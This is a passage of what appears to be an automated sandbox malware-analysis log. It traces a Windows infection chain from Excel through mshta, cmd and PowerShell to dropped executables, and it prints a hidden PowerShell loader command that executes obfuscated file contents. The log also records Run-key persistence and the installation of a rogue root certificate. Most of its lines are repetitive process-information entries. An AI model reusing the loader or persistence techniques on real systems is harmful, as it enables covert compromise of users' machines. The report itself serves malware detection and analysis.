          Source: C:\Users\user\AppData\Roaming\dllhost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$krjning=Get-Content -Raw 'C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Aerognosy.Res';$Lukewarmly95=$krjning.SubString(5322,3);.$Lukewarmly95($krjning)"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sm41lsyu\sm41lsyu.cmdline"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r4gn3nq1\r4gn3nq1.cmdline"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sm41lsyu\sm41lsyu.cmdline"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r4gn3nq1\r4gn3nq1.cmdline"
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 34_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,34_2_004044A4
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE896F022D push eax; iretd 7_2_000007FE896F0241
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE896F00BD pushad ; iretd 7_2_000007FE896F00C1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_04B630E8 push eax; iretd 12_2_04B63312
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_04B62EB4 push esi; iretd 12_2_04B62EBE
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_04B62EBF push esi; iretd 12_2_04B62EC2
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_04B633CF push edx; iretd 12_2_04B633D2
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_04B63310 push eax; iretd 12_2_04B63312
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_06554441 push ebp; iretd 12_2_06554442
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_06556667 push ebp; ret 12_2_0655666D
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_0655628D push edx; retf 12_2_065562BD
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_06550B59 push eax; iretd 12_2_06550B5B
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_06551F0F push ebx; iretd 12_2_06551F11
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_06554B20 push 763C485Bh; iretd 12_2_06554B2F
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_0655472A push 00000058h; retf 12_2_0655473A
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 33_2_01941F0F push ebx; iretd 33_2_01941F11
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 33_2_01944B20 push 763C485Bh; iretd 33_2_01944B2F
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 33_2_0194472A push 00000058h; retf 33_2_0194473A
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 33_2_01940B59 push eax; iretd 33_2_01940B5B
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 33_2_0194628D push edx; retf 33_2_019462BD
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 33_2_01944441 push ebp; iretd 33_2_01944442
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 33_2_01946667 push ebp; ret 33_2_0194666D
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 34_2_0044693D push ecx; ret 34_2_0044694D
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 34_2_0044DB70 push eax; ret 34_2_0044DB84
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 34_2_0044DB70 push eax; ret 34_2_0044DBAC
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 34_2_00451D54 push eax; ret 34_2_00451D61
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 35_2_0044B090 push eax; ret 35_2_0044B0A4
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 35_2_0044B090 push eax; ret 35_2_0044B0CC
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 35_2_00451D34 push eax; ret 35_2_00451D41
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 35_2_00444E71 push ecx; ret 35_2_00444E81
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 36_2_00414060 push eax; ret 36_2_00414074
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 36_2_00414060 push eax; ret 36_2_0041409C

          Persistence and Installation Behavior

          barindex
          Installs new ROOT certificates
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\sm41lsyu\sm41lsyu.dllJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\dllhost.exeJump to dropped file
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeJump to dropped file
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\r4gn3nq1\r4gn3nq1.dllJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\dllhost[1].exeJump to dropped file
          Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Chivey57
          Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Chivey57
          Source: C:\Users\user\AppData\Local\Temp\Vaccinerende.exeCode function: 35_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,35_2_004047CB
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
